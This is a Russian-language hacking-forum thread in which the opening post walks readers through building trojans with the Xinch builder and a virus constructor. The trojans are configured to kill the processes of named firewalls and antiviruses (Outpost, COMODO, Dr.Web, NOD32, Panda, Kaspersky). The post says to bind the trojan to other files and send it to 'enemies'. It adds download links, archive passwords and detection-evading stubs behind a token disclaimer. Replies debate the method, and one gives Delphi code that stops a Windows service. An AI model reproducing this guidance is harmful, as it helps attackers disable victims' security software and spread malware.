Всем привет! Хочу сейчас написать, как вырубать процессы файерволов и антивирей... Пишу не просто так, а потому что уже не однократно об этом просили. Сделать это ну ППЦ как легко, берём Ксинч (Xinch) (для тех кто не в курсе это троянский конь, типа пинч) или GeneratorKuzja v1.4 (конструктор вирусов - с помощью этого конструктора можно генерировать различную конфигурацию вирусов и залывать врагам, так же имеет функцию завершения процессов, именно это в нём сейчас нам и надо) 1. Если у Вас ещё нет Ксинча то скачайте (качайте либо ксичн, либо GeneratorKuzja v1.4 - впрочем Вам решать что выбирать, чтобы вырубать файерволлы и антивирусы) линки найдёте в конце статьи ( если это можно вообще назвать статьёй :-D ) или если Вам угодно юзайте поиск по форуму 2. После того как скачали делаем следующее: 2.1 Для Ксинча: открываем файл BuilderX.exe, в самом внизу открытой нами программы выбираем HTTP - это нам нужно чтобы отчёт не ушёл админу ксинча :-D. =>> переходим во вкладку "Процессы и сервисы" =>> поставьте галочку "Завершать процессы" а так же где "Отключать сервисы" тоже поставьте галочку. Для завершения файервов и антивирусов нам в принципе хватит и "завершать процессы". Теперь ставим курсор в пустое поле для ввода под "завершать процессы" и впишите следующие имена процессов: ( по очереди, и после каждого ввода имени нажимайте "Enter" ) outpost - Аутпост (файер) cfp - COMODO (файер) cmdagent - COMODO (файер) nTrayFw - Н-видиа файерволл (тут и так понятно SpiderNT - Доктор Веб (антивир) spidernt - Доктор Веб (у него 2 процесса практически индентичных..тока один из них отвечает за антивирусную БД (Базу данных) spiderml - Доктор Веб (процесс отвечает за канал данных смтп) nod32krn - Нод 32 (антивир) PavFnSvr - Панда (антивир) PavProt - тоже Панда pavprsrv - она же (файлов панды дофига...просто она у меня не установлена по-этому пишу все её файлы в процессах т.к. не знаю какой именно надо убивать ) pavsrv51 - ( Пандаа!!) kav [ - Каспер WindowsLogin] kavsvc - Каспер [SYSTEM] avp -КИС 7С7[WindowsLogin] avp - КИС 7 [SYSTEM] ... ну и т.д. (если знаете ещё имена процессов файеров и антивирусов то впишите и их...и не забудьте отписать здесь...лично мне будет интересно их знать (думаю не только мне . 2.2 После того как указали имена процессов нажимайте "Скомпилировать" и в когда Ксинч Вам сообщит что трой успешно скомпилирован (ищите его в папке ксинча - там где BuilderX.exe, готовый трой-рубильнеГ будет называться Xinch.... ну а дальше склеивайте с чем хотите, и если имя файера или (и) интивира в процессах будет, то этот рубильнег его (их) отрубит 2.3 Для GeneratorKuzja v1.4 : качаем генератор вирей в конце статьи (или опять же юзайте поиск по форуму...т.к. мало ли чего может случиться с моим сайтом…вдруг на момент прочтения Вами этой статьи сайтик прикроют =( ( http://fata1team.onep.ru ). 2.4 Итак… скачали теперь разархивируем архив и запускаем файл GeneratorKuzja1.4.exe. Переходим во вкладку “Процессы” и под заголовком “Завершить процессы” (в пустом поле для ввода) впишите выше перечисленные имена процессов, ТОЛЬКО ТЕПЕРЬ УЖЕ НУЖНО В КОНЕЦ ИМЕНИ КАЖДОГО ПРОЦЕССА ПОСТАВИТЬ РАСШИРЕНИЕ .exe (Пример: outpost.exe , spidernt.exe.) Надеюсь что эта статья облегчит жизнь новичков =). P.S. тестировалось это на Аутпосте и Др. Вебе. ( однозначно, ДОЛЖНО работать со всеми файерами и антивирусами). P.P.S. Я не увлекался здесь в подробностях настройки выше использованных программ, (генератор Кузя в этом и не нуждается) а вот настройку Ксинча (так и Пинча) Вы можете найти на нашем форуме (пока что там очень легко искать, т.к. не захламлён форум…) или же ищите на forum.antichat.ru (здесь это 10000% есть) Линки на скачку: http://fata1team.onep.ru/files/Viruses_troyans_backdoors/Pinch's/Xinch%20alfa5.rar Ксинч пасс на архив: fata1-team Генератор вирусов Кузя пасс на архив: 666 Почищеный стаб (06.01.2008) пасс на архив: 666 ------------------------------------------------------------------------------------------------------------------------------------------------ Засовывайте после того как разархивировали stub.rar =>> stub.exe в папку Stub (это чтобы антивирусы не палили) ищите обновления программы и чистые стабы в районе форума.античата.ру. Офсайт Кузи - http://kuzja-generator.ucoz.ru ------------------------------------------------------------------------------------------------------------------------------------------------ Всё. Статья написана ТОЛЬКО для ознакомительных целей, чтобы указать разработчикам вышеизложенного ПО (Программного Обеспечения) на их ошибки и не доработки... Вы обязуетесь не использовать данную статью для злого умысла, т.е. Отсылать что-либо "нечистое" в виде вирусов троянов и т.п. Автор данной статьи не несет никакой ответственности за Ваши действия. P.P.P.P.S. и вообще эту статью написала моя бабушка ещё в 19**-ом году... При размещении данной статьи прошу указывать автора... т.е. мою бабушку...--> <Mr.@1eX!> (fata1team.onep.ru) или alexman90 (forum.antichat.ru) -----------------------------------------------------------------------------------------------------------------НА МОЁМ САЙТЕ КРАСИВЕЕ ВЫШЛО =) ------------------------------- Cпециально для fata1team.onep.ru и antichat.ru
Iddqd-согласен. aлекс ну теперь что все заклатки хинча опсуждать ,обеснатЬ будем в риде все расписано каму не лень четать.
Я написал если заметил не только о ксинче =) вот ты согласился с Iddqd... а ты сам попробуй проверить! я ж говорю что тестировал на Аутпосте и Докторе Вебе... разве не убедительно? А написал я эту статью т.к. многие не знают что в Ксинче и Кузе есть такие интересные фичи... они реально завершают процессы... вот проверьте сами плиз)
Чувак, знаю точно что каспер и НОД32, не дадут вырубить свои процессы у тебя прав не хватит... А то было бы слишком просто....
Тема с таким интригующим названием не должна содержать простое описание возможностей конкретных особей троянских коней. Минус пицот.
Я вижу здесь простое описание троянского коня типа "Ксинч". Похоже, для тебя это открытие Америки, но на самом деле это примитив.
Значит слепой ты! тут ещё говорится и о Конструкторе вирусов Кузе!!! ДА дело и не в этом! я же не пишу как работать с этим троем! я этим ещё по раньше вашего занимался, так что не надо уприкать в "открытии америки"Я ЕЩЁ РАЗ ГОВОРЮ ЧТО Я ОПИСАЛ ВСЕГО ЛИШ СПОСОБ ЗАВЕРШЕНИЯ ПРОЦЕССА! ЕСЛИ ТАКОЙ УМНЫЙ ТО САМ НАПИШИ КАК ЗАВЕРШАТЬ ПРОЦЕССЫ БЕЗ ЭТИХ ТРОЕВ!!
Ох, точно, ещё и Кузя... Чтобы завершить процесс без троя можно зайти в диспетчер задач, вкладка "Процессы", выделить нужный процесс и нажать кнопку "Завершить процесс".
Вот ещё вам способ выключить процесс програмно (код на дельфи): Code: procedure TForm1.Button1Click(Sender: TObject); var servicemanager, service:Cardinal; ss:SERVICE_STATUS; begin servicemanager:=OpenSCManager(nil, nil, SC_MANAGER_ALL_ACCESS); service:=OpenService(servicemanager, 'Messenger', SERVICE_ALL_ACCESS); if service=0 then begin ShowMessage('Îøèáêà'); exit; end; ControlService(service, SERVICE_CONTROL_STOP, ss); CloseServiceHandle(service); end;
